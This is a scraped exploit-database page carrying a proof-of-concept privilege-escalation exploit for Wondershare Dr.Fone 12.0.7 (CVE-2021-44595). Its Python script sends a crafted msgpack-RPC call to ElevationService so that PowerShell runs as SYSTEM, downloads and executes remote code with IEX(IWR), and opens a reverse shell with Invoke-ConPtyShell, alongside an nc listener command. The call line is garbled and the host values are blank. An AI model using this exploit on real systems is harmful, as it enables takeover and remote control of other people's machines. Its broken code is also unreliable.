Wondershare Dr.Fone 12.0.7 Privilege Escalation (ElevationService)

CVE Category Price Severity
Not specified CWE-264 Not specified High
Author Risk Exploitation Type Date
Not specified High Local 2022-05-29

CVSS vector description

Our sensors found this exploit at:

Below is a copy:

Wondershare Dr.Fone 12.0.7 Privilege Escalation (ElevationService)
# Exploit Title: Wondershare Dr.Fone 12.0.7 - Privilege Escalation (ElevationService)
# Date: 4/27/2022
# Exploit Author: Netanel Cohen & Tomer Peled
# Vendor Homepage:
# Software Link:
# Version: up to 12.0.7
# Tested on: Windows 10
# CVE : 2021-44595
# References:

#Wondershare Dr. Fone Latest version as of 2021-12-06 is vulnerable to Incorrect Access Control. A normal user can send manually crafted packets to the ElevationService.exe and #execute arbitrary code without any validation with SYSTEM privileges.

import msgpackrpc

LADDR = ""
LPORT =  1338

RADDR = ""
RPORT = 12345

param = f"IEX(IWR -UseBasicParsing); Invoke-ConPtyShell {LADDR} {int(LPORT)}"
client = msgpackrpc.Client(msgpackrpc.Address(RADDR, 12345))
result ='system_s','powershell',param)

# stty raw -echo; (stty size; cat) | nc -lvnp 1338

Copyright ©2024 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.